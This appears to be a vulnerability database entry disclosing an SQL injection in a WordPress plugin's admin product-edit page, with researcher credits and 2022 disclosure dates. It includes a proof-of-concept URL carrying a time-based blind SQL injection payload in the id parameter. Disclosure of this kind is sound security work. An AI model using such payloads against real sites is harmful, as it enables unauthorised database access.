The plugin does not sanitise and escape the id parameter before using it in a SQL statement when editing a product via the admin dashboard, leading to an SQL injection.
https://example/wp-admin/admin.php?page=fmwes_edit_product&id=1+AND+(SELECT+6037+FROM+(SELECT(SLEEP(5)))Uiuu)
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Daniel Krohmer
Yes
2022-05-09 (about 1 year ago)
2022-05-12 (about 1 year ago)
2022-05-13 (about 1 year ago)